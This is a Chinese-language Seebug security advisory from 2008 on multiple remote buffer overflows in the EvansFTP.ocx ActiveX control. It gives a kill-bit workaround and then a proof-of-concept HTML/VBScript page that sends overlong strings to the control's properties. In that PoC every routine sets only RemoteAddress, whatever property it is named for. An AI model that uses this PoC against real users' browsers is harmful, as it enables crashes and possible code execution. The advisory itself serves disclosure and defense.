Evans FTP EvansFTP.ocx ActiveX控件多个远程溢出漏洞

2008-12-19T00:00:00
ID SSV:4571
Type seebug
Reporter Root
Modified 2008-12-19T00:00:00

Description

BUGTRAQ ID: 32814

Evans FTP是以ActiveX FTP控件形式提供的FTP编程解决方案。

EvansFTP.ocx ActiveX控件控件没有正确地验证对RemoteAddress、ProxyPrefix、ProxyName、Password、ProxyBypassList、LoginName和CurrentDirectory属性所传送的参数。如果用户受骗访问了恶意网页并向上述属性传送了超长字符串参数的话,就可以触发缓冲区溢出,导致执行任意指令。

Evans Programming Evans FTP 临时解决方法:

  • 为Clsid {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}设置kill-bit。

厂商补丁:

Evans Programming

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.evansprogramming.com/evansftp.asp target=_blank>http://www.evansprogramming.com/evansftp.asp</a>

                                        
                                            
                                                &lt;HTML&gt;
&lt;package&gt;&lt;job id='DoneInVBS' debug='false' error='true'&gt;
&lt;object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' /&gt;
&lt;HEAD&gt;
  &lt;TITLE&gt;EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC&lt;/TITLE&gt;
&lt;/HEAD&gt;
&lt;BODY&gt;

&lt;/pre&gt;
&lt;script language='vbscript'&gt;
Sub RemoteAddress
arg1=String(2068, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub

Sub ProxyPrefix
arg1=String(1044, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub

Sub ProxyName
arg1=String(1044, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub

Sub Password
arg1=String(1044, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub

Sub ProxyBypassList
arg1=String(1044, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub

Sub LoginName
arg1=String(1044, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub

Sub CurrentDirectory
arg1=String(1044, &quot;A&quot;)
beard.RemoteAddress = arg1
End Sub
&lt;/script&gt;&lt;br&gt;&lt;br&gt;

&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;RemoteAddress PoC&quot; ONCLICK=RemoteAddress()&gt;
&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;ProxyPrefix PoC&quot; ONCLICK=ProxyPrefix()&gt;
&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;ProxyName  PoC&quot; ONCLICK=ProxyName()&gt;
&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;Password PoC&quot; ONCLICK=Password()&gt;
&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;ProxyBypassList PoC&quot; ONCLICK=ProxyBypassList()&gt;
&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;LoginName PoC&quot; ONCLICK=LoginName()&gt;
&lt;INPUT TYPE=&quot;button&quot; VALUE=&quot;CurrentDirectory PoC&quot; ONCLICK=CurrentDirectory()&gt;&lt;br&gt;&lt;br&gt;

&lt;/BODY&gt;
&lt;/HTML&gt;